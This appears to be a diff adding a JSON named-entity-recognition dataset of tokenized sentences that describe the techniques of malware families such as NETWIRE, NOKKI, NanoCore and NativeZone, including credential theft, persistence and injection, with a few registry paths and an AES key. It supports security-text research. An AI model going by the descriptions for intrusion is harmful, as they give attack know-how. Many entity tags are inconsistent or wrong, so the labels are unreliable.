+ "tokens": [ + "NETWIRE", + "has", + "the", + "ability", + "to", + "compress", + "archived", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "used", + "a", + "custom", + "encryption", + "algorithm", + "to", + "encrypt", + "collected", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "automatically", + "archive", + "collected", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "retrieve", + "passwords", + "from", + "messaging", + "and", + "mail", + "client", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "the", + "ability", + "to", + "steal", + "credentials", + "from", + "web", + "browsers", + "including", + "Internet", + "Explorer,", + "Opera,", + "Yandex,", + "and", + "Chrome." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "use", + "crontabs", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "the", + "ability", + "to", + "search", + "for", + "files", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "store", + "its", + "configuration", + "information", + "in", + "the", + "Registry", + "under", + "`HKCU:\\Software\\Netwire`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "copy", + "itself", + "to", + "and", + "launch", + "itself", + "from", + "hidden", + "folders." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "downloaded", + "payloads", + "from", + "C2", + "to", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "NETWIRE", + "client", + "has", + "been", + "signed", + "by", + "fake", + "and", + "invalid", + "digital", + "certificates." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "perform", + "keylogging." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "use", + "launch", + "agents", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "the", + "ability", + "to", + "write", + "collected", + "data", + "to", + "a", + "file", + "created", + "in", + "the", + "<code>./LOGS</code>", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "persist", + "via", + "startup", + "options", + "for", + "Login", + "items." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "been", + "executed", + "through", + "luring", + "victims", + "into", + "opening", + "malicious", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "been", + "executed", + "through", + "convincing", + "victims", + "into", + "clicking", + "malicious", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "masqueraded", + "as", + "legitimate", + "software", + "including", + "TeamViewer", + "and", + "macOS", + "Finder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "modify", + "the", + "Registry", + "to", + "store", + "its", + "configuration", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "use", + "Native", + "API", + "including", + "<code>CreateProcess</code>", + "<code>GetProcessById</code>,", + "and", + "<code>WriteProcessMemory</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "use", + "TCP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "used", + "a", + "custom", + "obfuscation", + "algorithm", + "to", + "hide", + "strings", + "including", + "Registry", + "keys,", + "APIs,", + "and", + "DLL", + "names." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "NETWIRE", + "binary", + "has", + "been", + "executed", + "via", + "PowerShell", + "script." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "discover", + "processes", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "NETWIRE", + "payload", + "has", + "been", + "injected", + "into", + "benign", + "Microsoft", + "executables", + "via", + "process", + "hollowing." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "inject", + "code", + "into", + "system", + "processes", + "including", + "notepad.exe,", + "svchost.exe,", + "and", + "vbc.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "implement", + "use", + "of", + "proxies", + "to", + "pivot", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "creates", + "a", + "Registry", + "start-up", + "entry", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "create", + "a", + "scheduled", + "task", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "capture", + "the", + "victim's", + "screen." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "used", + ".NET", + "packer", + "tools", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "been", + "spread", + "via", + "e-mail", + "campaigns", + "utilizing", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "been", + "spread", + "via", + "e-mail", + "campaigns", + "utilizing", + "malicious", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "use", + "AES", + "encryption", + "for", + "C2", + "data", + "transferred." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "discover", + "and", + "collect", + "victim", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "collect", + "the", + "IP", + "address", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "capture", + "session", + "logon", + "details", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "the", + "ability", + "to", + "use", + "<code>/bin/bash</code>", + "and", + "<code>/bin/sh</code>", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "been", + "executed", + "through", + "use", + "of", + "VBScripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "the", + "ability", + "to", + "communicate", + "over", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NETWIRE", + "has", + "used", + "web", + "services", + "including", + "Paste.ee", + "to", + "host", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "issue", + "commands", + "using", + "cmd.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NETWIRE", + "can", + "use", + "XDG", + "Autostart", + "Entries", + "to", + "establish", + "persistence", + "on", + "Linux", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NGLite", + "has", + "abused", + "NKN", + "infrastructure", + "for", + "its", + "C2", + "communication." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NGLite", + "will", + "use", + "an", + "AES", + "encrypted", + "channel", + "for", + "command", + "and", + "control", + "purposes,", + "in", + "one", + "case", + "using", + "the", + "key", + "<code>WHATswrongwithUu</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NGLite", + "identifies", + "the", + "victim", + "system", + "MAC", + "and", + "IPv4", + "addresses", + "and", + "uses", + "these", + "to", + "establish", + "a", + "victim", + "identifier." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NGLite", + "will", + "run", + "the", + "<code>whoami</code>", + "command", + "to", + "gather", + "system", + "information", + "and", + "return", + "this", + "to", + "the", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NGLite", + "will", + "initially", + "beacon", + "out", + "to", + "the", + "NKN", + "network", + "via", + "an", + "HTTP", + "POST", + "over", + "TCP", + "30003." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "uses", + "a", + "Cron", + "job", + "to", + "establish", + "persistence", + "when", + "infecting", + "Linux", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "utilizes", + "external", + "services", + "such", + "as", + "<code>ifconfig.me</code>", + "to", + "identify", + "the", + "victim", + "machine's", + "IP", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "has", + "abused", + "the", + "NKN", + "public", + "blockchain", + "protocol", + "for", + "its", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "enables", + "multiple", + "types", + "of", + "network", + "denial", + "of", + "service", + "capabilities", + "across", + "several", + "protocols", + "post-installation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "will", + "check", + "victim", + "systems", + "to", + "ensure", + "only", + "one", + "copy", + "of", + "the", + "malware", + "is", + "running." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "can", + "take", + "screenshots", + "of", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "conducts", + "multiple", + "system", + "checks", + "and", + "includes", + "these", + "in", + "subsequent", + "\"heartbeat\"", + "messages", + "to", + "the", + "malware's", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NKAbuse", + "is", + "initially", + "installed", + "and", + "executed", + "through", + "an", + "initial", + "shell", + "script." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "uses", + "the", + "Windows", + "call", + "SetWindowsHookEx", + "and", + "begins", + "injecting", + "it", + "into", + "every", + "GUI", + "process", + "running", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "uses", + "a", + "unique,", + "custom", + "de-obfuscation", + "technique." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "can", + "delete", + "files", + "to", + "cover", + "tracks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "has", + "used", + "FTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "has", + "downloaded", + "a", + "remote", + "module", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "can", + "collect", + "data", + "from", + "the", + "victim", + "and", + "stage", + "it", + "in", + "<code>LOCALAPPDATA%\\MicroSoft", + "Updatea\\uplog.tmp</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "is", + "written", + "to", + "%LOCALAPPDATA%\\MicroSoft", + "Updatea\\svServiceUpdate.exe", + "prior", + "being", + "executed", + "in", + "a", + "new", + "process", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "folder", + "and", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "uses", + "Base64", + "encoding", + "for", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "has", + "established", + "persistence", + "by", + "writing", + "the", + "payload", + "to", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "has", + "used", + "rundll32", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "can", + "gather", + "information", + "on", + "drives", + "and", + "the", + "operating", + "system", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "can", + "gather", + "information", + "on", + "the", + "victim", + "IP", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "can", + "collect", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "can", + "collect", + "the", + "current", + "timestamp", + "of", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NOKKI", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naid", + "creates", + "Registry", + "entries", + "that", + "store", + "information", + "about", + "a", + "created", + "service", + "and", + "point", + "to", + "a", + "malicious", + "DLL", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naid", + "collects", + "a", + "unique", + "identifier", + "(UID)", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naid", + "collects", + "the", + "domain", + "name", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Naid", + "creates", + "a", + "new", + "service", + "to", + "establish." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "uses", + "DNS", + "for", + "the", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "can", + "change", + "Internet", + "Explorer", + "settings", + "to", + "reduce", + "warnings", + "about", + "malware", + "activity." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "NanHaiShu", + "encodes", + "files", + "in", + "Base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "launches", + "a", + "script", + "to", + "delete", + "their", + "original", + "decoy", + "file", + "to", + "cover", + "tracks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "can", + "download", + "additional", + "files", + "from", + "URLs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "executes", + "additional", + "Jscript", + "code", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "uses", + "mshta.exe", + "to", + "load", + "its", + "program", + "and", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "modifies", + "the", + "%regrun%", + "Registry", + "to", + "point", + "itself", + "to", + "an", + "autostart", + "mechanism." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "can", + "gather", + "the", + "victim", + "computer", + "name", + "and", + "serial", + "number." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "can", + "gather", + "information", + "about", + "the", + "victim", + "proxy", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "collects", + "the", + "username", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanHaiShu", + "executes", + "additional", + "VBScript", + "code", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "can", + "capture", + "audio", + "feeds", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "can", + "modify", + "the", + "victim's", + "firewall." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "NanoCore", + "can", + "modify", + "the", + "victim's", + "anti-virus." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "has", + "the", + "capability", + "to", + "download", + "and", + "activate", + "additional", + "modules", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "can", + "perform", + "keylogging", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "has", + "the", + "capability", + "to", + "edit", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "NanoCore’s", + "plugins", + "were", + "obfuscated", + "with", + "Eazfuscater.NET", + "3.3." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "NanoCore", + "creates", + "a", + "RunOnce", + "key", + "in", + "the", + "Registry", + "to", + "execute", + "its", + "VBS", + "scripts", + "each", + "time", + "the", + "user", + "logs", + "on", + "to", + "the", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "uses", + "DES", + "to", + "encrypt", + "the", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "gathers", + "the", + "IP", + "address", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "can", + "access", + "the", + "victim's", + "webcam", + "and", + "capture", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "NanoCore", + "uses", + "VBS", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "B-Features" + ] + }, + { + "tokens": [ + "NanoCore", + "can", + "open", + "a", + "remote", + "command-line", + "interface", + "and", + "execute", + "commands.", + "NanoCore", + "uses", + "JavaScript", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-SamFile", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "NativeZone", + "can", + "decrypt", + "and", + "decode", + "embedded", + "Cobalt", + "Strike", + "beacon", + "stage", + "shellcode." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "NativeZone", + "can", + "check", + "for", + "the", + "presence", + "of", + "KM.EkeyAlmaz1C.dll", + "and", + "will", + "halt", + "execution", + "unless", + "it", + "is", + "in", + "the", + "same", + "directory", + "as", + "the", + "rest", + "of", + "the", + "malware's", + "components." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NativeZone", + "can", + "display", + "an", + "RTF", + "document", + "to", + "the", + "user", + "to", + "enable", + "execution", + "of", + "Cobalt", + "Strike", + "stage", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NativeZone", + "has,", + "upon", + "execution,", + "displayed", + "a", + "message", + "box", + "that", + "appears", + "to", + "be", + "related", + "to", + "a", + "Ukrainian", + "electronic", + "document", + "management", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NativeZone", + "has", + "used", + "rundll32", + "to", + "execute", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "NativeZone", + "has", + "checked", + "if", + "Vmware", + "or", + "VirtualBox", + "VM", + "is", + "running", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NavRAT", + "can", + "download", + "files", + "remotely." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + 